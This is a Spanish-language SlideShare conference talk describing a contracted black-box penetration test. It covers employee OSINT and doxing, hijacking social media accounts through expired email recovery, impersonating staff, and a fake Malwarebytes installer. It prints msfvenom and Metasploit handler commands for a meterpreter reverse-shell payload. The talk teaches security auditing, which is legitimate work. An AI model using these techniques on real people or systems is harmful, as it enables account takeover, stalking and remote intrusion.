Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Auditoría de seguridad
en el sur
Por Jorge Websec
24/1/2016 WWW.QUANTIKA14.COM 1
¿Quién soy yo?
24/1/2016 WWW.QUANTIKA14.COM 2
•Fundador de empresas de seguridad informática
QuantiKa14.
•Fundador de EXO ...
Seguridad en el sur…
•Sevilla: 1.100
•Cádiz: 393
•Huelva: 161
•Córdoba: 313
•Málaga: 972
•Jaén: 190
•Almería: 269
Datos de...
Seguridad en el sur…
0
0,5
1
1,5
2
2,5
3
3,5
4
4,5
5
2012 2013 2014 2015
Creación de empresas Seguridad
Informática
Andalu...
Procesos…
•Firma de contrato.
•Objetivos.
•Recogida de datos (footprinting &
fingerprinting)
•Análisis de vulnerabilidades...
Firma de contrato
•Empleados y directivos deben
firmar un contrato.
•Proveedores, colaboradores y
asociados firman o son a...
Formas y métodos de pagos
•50 % en la firma del contrato.
•25% a los 20 días de la firma del
contrato.
•25% en la entrega ...
OBJETIVOS
•Simular un ataque informático de
caja negra.
•Hacerlo en 40 días máximo.
•Informar de posibles fugas de
informa...
La empresa…
24/1/2016 WWW.QUANTIKA14.COM 9
IMAGINEMOS A LA EMPRESA
24/1/2016 WWW.QUANTIKA14.COM 10
MECH3RO PACK
•Pack de scripts creados por Jorge
Websec para la recogida de datos.
BOTENTRIANA.WORDPRESS.COM
•Python 2.7.9
...
MECH3RO I
Redes sociales de la empresa.
24/1/2016 WWW.QUANTIKA14.COM 12
Listado de empleados
•Listado de trabajadores en la
empresa usando M3chero.
•Buscadores.
•Prensa.
•Harvesting email con em...
ASOCIACIÓN DE SEGURIDAD PRIVADA
Identificamos las asociaciones.
Eventos.
Páginas webs.
Obtenemos listado de
empleados del
...
La técnica de los 3 años
•Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años
hasta ser borrados por inactivid...
MECH3RO II : validar cuenta de email
•Dentro de Mech3ro Pack encontraremos “email_validator.py”para
validar cuentas email ...
Mech3ro III: validar cuentas de
Twitter y FB
•Las cuentas de la lista que no existan por tiempo inactivo o porque el
usuar...
PROCESOS
24/1/2016 WWW.QUANTIKA14.COM 18
LISTA DE EMAILS
¿EXISTE? SINo
ASOCIADO ALGUNA
CUENTA
Si
No
CREAR CORREO
RECUPERAR...
OBJETIVO CUMPLIDO
• Conseguimos acceso a varias cuentas de Facebook y Twitter.
• Haciéndonos pasar por uno de los empleado...
¿Localizar a empleados?
•El uso de Internet siempre deja
rastros de tu actividad en la vida
real.
•Sabiendo usar los datos...
MECH3RO IV: Meetup
24/1/2016 WWW.QUANTIKA14.COM 21
Bot de Meetup
ACCEDE A MEETUP
http://www.meetup.com/es-
ES/find/events/...
MECH3RO V: CRUZAR DATOS I
24/1/2016 WWW.QUANTIKA14.COM 22
Usuarios que van a evento de
MeetUp
Diego
Martínez
Ricardo
Gonza...
Un poquito de Ingeniería social…
•Sabíamos los eventos próximos
que visitarían.
•Sabiendo sus redes sociales
sabíamos sus ...
¿Qué averiguamos?
•Existe un sistema de acceso a diferentes salas.
•Una empleada guarda claves de accesos a diferentes sal...
Bares de la zona…
•Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”.
•Mac Donald -> Demasiado genérico.
•Bar “...
Suplantación de email
24/1/2016 WWW.QUANTIKA14.COM 26
Fake Malwarebytes Anti-malware
24/1/2016 WWW.QUANTIKA14.COM 27
Creamos el payload
24/1/2016 WWW.QUANTIKA14.COM 28
Creamos payload II
•# msfvenom -p windows/meterpreter/reverse_tcp -b ‘x00’
LHOST=192.168.1.10 LPORT=4444 -x /home/root/Esc...
Binder
24/1/2016 WWW.QUANTIKA14.COM 30
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST...
24/1/2016 WWW.QUANTIKA14.COM 32
Pivoting: Mapa de red
Desde las máquinas infectadas hacemos
un escáner de la red.
Con el correo que le enviamos…
Registramos el USER-AGENT y la IP
Local.
http://net.ipcalf.com/
Le enviamos…Un mail con el enlace maligno.
¡Muchas gracias por su atención!
@QuantiKa14
/quantika14
/quantika14
Si quieres descargar MECH3RO PACK
VISITA MI BLOG BOTE...
Upcoming SlideShare
Loading in …5
×

Auditoría informática de seguridad de caja negra en el sur

1,057 views

Published on

Presentación utilizada para la #SHSCo2016 en Córdoba por @JorgeWebsec

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Auditoría informática de seguridad de caja negra en el sur

  1. 1. Auditoría de seguridad en el sur Por Jorge Websec 24/1/2016 WWW.QUANTIKA14.COM 1
  2. 2. ¿Quién soy yo? 24/1/2016 WWW.QUANTIKA14.COM 2 •Fundador de empresas de seguridad informática QuantiKa14. •Fundador de EXO Security, localización de personas. •Dueño del bar K’talo en la calle niebla 25, Sevilla. •Fundador y miembro del proyecto WordPressA. •Creador del proyecto Triana Browser. •Autor del blog www.botentriana.wordpress.com •Especialista en bots y BigData.
  3. 3. Seguridad en el sur… •Sevilla: 1.100 •Cádiz: 393 •Huelva: 161 •Córdoba: 313 •Málaga: 972 •Jaén: 190 •Almería: 269 Datos de BigData QuantiKa14. 24/1/2016 WWW.QUANTIKA14.COM 3
  4. 4. Seguridad en el sur… 0 0,5 1 1,5 2 2,5 3 3,5 4 4,5 5 2012 2013 2014 2015 Creación de empresas Seguridad Informática Andalucia Madrid Barcelona •Aumento del crecimiento en Andalucía. •Constante crecimiento en Madrid y Barcelona. 24/1/2016 WWW.QUANTIKA14.COM 4
  5. 5. Procesos… •Firma de contrato. •Objetivos. •Recogida de datos (footprinting & fingerprinting) •Análisis de vulnerabilidades. •Explotación. •Informe. 24/1/2016 WWW.QUANTIKA14.COM 5
  6. 6. Firma de contrato •Empleados y directivos deben firmar un contrato. •Proveedores, colaboradores y asociados firman o son avisados. •Firma de contrato de confidencialidad y secreto. •Notificación previa de acciones que pueden perjudicar gravemente a la empresa. •Formas y métodos de pago. 24/1/2016 WWW.QUANTIKA14.COM 6
  7. 7. Formas y métodos de pagos •50 % en la firma del contrato. •25% a los 20 días de la firma del contrato. •25% en la entrega del informe. 24/1/2016 WWW.QUANTIKA14.COM 7
  8. 8. OBJETIVOS •Simular un ataque informático de caja negra. •Hacerlo en 40 días máximo. •Informar de posibles fugas de información o de accesos no autorizados. 24/1/2016 WWW.QUANTIKA14.COM 8
  9. 9. La empresa… 24/1/2016 WWW.QUANTIKA14.COM 9
  10. 10. IMAGINEMOS A LA EMPRESA 24/1/2016 WWW.QUANTIKA14.COM 10
  11. 11. MECH3RO PACK •Pack de scripts creados por Jorge Websec para la recogida de datos. BOTENTRIANA.WORDPRESS.COM •Python 2.7.9 •Librerías: mechanize y beautifulSoup. 24/1/2016 WWW.QUANTIKA14.COM 11
  12. 12. MECH3RO I Redes sociales de la empresa. 24/1/2016 WWW.QUANTIKA14.COM 12
  13. 13. Listado de empleados •Listado de trabajadores en la empresa usando M3chero. •Buscadores. •Prensa. •Harvesting email con email collector Metasploit. •LinkedIn. 24/1/2016 WWW.QUANTIKA14.COM 13
  14. 14. ASOCIACIÓN DE SEGURIDAD PRIVADA Identificamos las asociaciones. Eventos. Páginas webs. Obtenemos listado de empleados del departamento de seguridad. El objetivo es obtener el listado de empleados.
  15. 15. La técnica de los 3 años •Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años hasta ser borrados por inactividad. •¿La cuenta de tu infancia es la misma que usas para las redes sociales? 24/1/2016 WWW.QUANTIKA14.COM 15
  16. 16. MECH3RO II : validar cuenta de email •Dentro de Mech3ro Pack encontraremos “email_validator.py”para validar cuentas email masivamente. 24/1/2016 WWW.QUANTIKA14.COM 16
  17. 17. Mech3ro III: validar cuentas de Twitter y FB •Las cuentas de la lista que no existan por tiempo inactivo o porque el usuario los haya borrado, creamos una nueva lista diferente. •La nueva lista la usará “validator_twitter_fbyTwt.py” para asociar una cuenta de correo a una cuenta de Facebook y Twitter. •Las que den positivas en las cuentas de RRSS solo hará falta crear de nuevo la cuenta y darle a recordar contraseña. 24/1/2016 WWW.QUANTIKA14.COM 17
  18. 18. PROCESOS 24/1/2016 WWW.QUANTIKA14.COM 18 LISTA DE EMAILS ¿EXISTE? SINo ASOCIADO ALGUNA CUENTA Si No CREAR CORREO RECUPERAR CONTRASEÑA
  19. 19. OBJETIVO CUMPLIDO • Conseguimos acceso a varias cuentas de Facebook y Twitter. • Haciéndonos pasar por uno de los empleados de seguridad le pedimos a otro que hemos perdido el listado y nos lo manda.
  20. 20. ¿Localizar a empleados? •El uso de Internet siempre deja rastros de tu actividad en la vida real. •Sabiendo usar los datos que se exponen en las diferentes plataformas podemos saber donde te mueves. 24/1/2016 WWW.QUANTIKA14.COM 20 Doxing: investigar, analizar, recopilar información de una persona en Internet. Asociar una identidad virtual a una física.
  21. 21. MECH3RO IV: Meetup 24/1/2016 WWW.QUANTIKA14.COM 21 Bot de Meetup ACCEDE A MEETUP http://www.meetup.com/es- ES/find/events/?allMeetups=true&radius=62&userFre eform=Sevilla Bot de Meetup 2 ACCEDE A CADA EVENTO
  22. 22. MECH3RO V: CRUZAR DATOS I 24/1/2016 WWW.QUANTIKA14.COM 22 Usuarios que van a evento de MeetUp Diego Martínez Ricardo Gonzalez Juan Jiménez
  23. 23. Un poquito de Ingeniería social… •Sabíamos los eventos próximos que visitarían. •Sabiendo sus redes sociales sabíamos sus gustos, publicaciones y comentarios. •Sabíamos que la empresa había implementado un sistema de acceso hace poco por una subvención. ¿Biometría? 24/1/2016 WWW.QUANTIKA14.COM 23
  24. 24. ¿Qué averiguamos? •Existe un sistema de acceso a diferentes salas. •Una empleada guarda claves de accesos a diferentes salas en un txt en su ordenador. [¿Quién?] •Los empleados suelen frecuentar diferentes bares de la zona donde se encuentra el edificio de la empresa. [Podemos identificar según los clientes Wifi] 24/1/2016 WWW.QUANTIKA14.COM 24
  25. 25. Bares de la zona… •Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”. •Mac Donald -> Demasiado genérico. •Bar “el eructo feliz” -> ESSID:”ERUCTOFELIZ-WIFI”. 24/1/2016 WWW.QUANTIKA14.COM 25 De esta forma podíamos identificar en que eventos se encuentran empleados de la empresa.
  26. 26. Suplantación de email 24/1/2016 WWW.QUANTIKA14.COM 26
  27. 27. Fake Malwarebytes Anti-malware 24/1/2016 WWW.QUANTIKA14.COM 27
  28. 28. Creamos el payload 24/1/2016 WWW.QUANTIKA14.COM 28
  29. 29. Creamos payload II •# msfvenom -p windows/meterpreter/reverse_tcp -b ‘x00’ LHOST=192.168.1.10 LPORT=4444 -x /home/root/Escritorio/FAKE.exe -f exe > bicho.exe •-b: evitar caracteres vacíos o malos. •-x: plantilla •-i: interacciones del encoder •-e: encoder -> x86/shikata_ga_nai 24/1/2016 WWW.QUANTIKA14.COM 29
  30. 30. Binder 24/1/2016 WWW.QUANTIKA14.COM 30
  31. 31. msf> use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55) msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444) msf exploit(handler) > exploit [*] Started reverse handler on 192.168.75.35:4444 [*] Starting the payload handler… Escuchamos
  32. 32. 24/1/2016 WWW.QUANTIKA14.COM 32 Pivoting: Mapa de red Desde las máquinas infectadas hacemos un escáner de la red.
  33. 33. Con el correo que le enviamos… Registramos el USER-AGENT y la IP Local. http://net.ipcalf.com/
  34. 34. Le enviamos…Un mail con el enlace maligno.
  35. 35. ¡Muchas gracias por su atención! @QuantiKa14 /quantika14 /quantika14 Si quieres descargar MECH3RO PACK VISITA MI BLOG BOTENTRIANA.WORDPRESS.COM

×